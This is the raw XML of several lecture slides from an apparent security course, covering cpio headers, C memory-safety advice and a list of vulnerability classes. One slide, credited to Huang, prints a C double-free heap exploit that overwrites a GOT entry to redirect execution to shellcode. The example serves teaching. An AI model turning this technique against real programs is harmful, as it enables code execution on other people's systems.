                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>cpio {-o} [options] &lt; name-list [&gt; archive]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The format description is described in the linux manual page, which you can get by typing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>man cpio</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Each file system object in a archive comprises a header record with basic numeric metadata followed by the full pathname of the entry and the file data.  See other panel.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{832065CE-DE13-8140-887F-6D558E3F0A5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6592340" y="1486200"/>
            <a:ext cx="5023011" cy="47561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800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A626A4"/>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cpio_newc_header {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c_magic[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="986801"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>6</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c_ino[</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c_mode[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c_uid[</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c_gid[</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c_nlink[</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c_mtime[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c_filesize[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c_devmajor[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c_devminor[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c_rdevmajor[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c_rdevminor[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c_namesize[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c_check[</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" algn="l"/>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ea typeface="Arial" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11992206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113983"/>
            <a:ext cx="11213736" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Heap exploit after double free</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374175" y="1588496"/>
            <a:ext cx="6712425" cy="4921075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>static char *GOT_LOCATION =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  (char *)0x0804c98c; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>static char shellcode[] = </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   "\xeb\x0cjump12chars_”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    "\x90\x90\x90\x90\x90\x90\x90\x90" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int main(void){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int size = sizeof(shellcode);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void *shellcode_location;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void *first, *second, *third, *fourth; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  void *fifth, *sixth, *seventh; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  shellcode_location = (void *)malloc(size); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  strcpy(shellcode_location, shellcode); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  first = (void *)malloc(256); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  second = (void *)malloc(256); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </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130</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{824BC2CB-7BB6-9C4C-929E-BC17DFA4E430}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6547922" y="1571682"/>
            <a:ext cx="5602514" cy="49210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0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  third = (void *)malloc(256); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  fourth = (void *)malloc(256); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  free(first); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  free(third); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  fifth = (void *)malloc(128); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  free(first); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  // sixth will get ptr to first</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  sixth = (void *)malloc(256); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  *((void **)(sixth+0))=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       (void *)(GOT_LOCATION-12); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   *((void**)(sixth+4))=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      (void*)shellcode_location; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  // returns location yet again</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  seventh = (void *)malloc(256); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  strcpy(fifth, "something"); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  return 0; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84921072-8CBB-5344-8536-2948E7CEAEF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694267" y="5875867"/>
            <a:ext cx="4673600" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From: Huang, Heap overflow attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7074682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Know your programming language</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411971" y="1692911"/>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Reference/value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>C++ allows passing pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>A vulnerable or malicious program can use a pointer to change unintended values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Scope and memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Since it is difficult to manage object lifetimes which are “malloc’d” and ”free’d” during object lifetime, you should prefer lexical allocation where object is allocated and deallocated automatically as objects “go out of scope.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>For example, prefer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>char buf[256];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>To</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>char* buf = malloc(256);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>free(buf);</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131</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30837755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70203"/>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7, other vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="619432" y="1754659"/>
            <a:ext cx="11112910" cy="4784254"/>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More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TOCTOU</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Command injection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SQL injection</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Phishing and mail</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Resource exhaustion</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user</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Distributed system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Timing, synchronization and consensus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Update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The Web and browsers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APTs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Supply chain vulnerabilities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132</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27343622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08" y="120519"/>
            <a:ext cx="11825416" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Timing vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1380899" y="4406730"/>
            <a:ext cx="9459034" cy="1949621"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Johns-MacBook-Pro-3:cryptobin jlm$ ./race_example.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
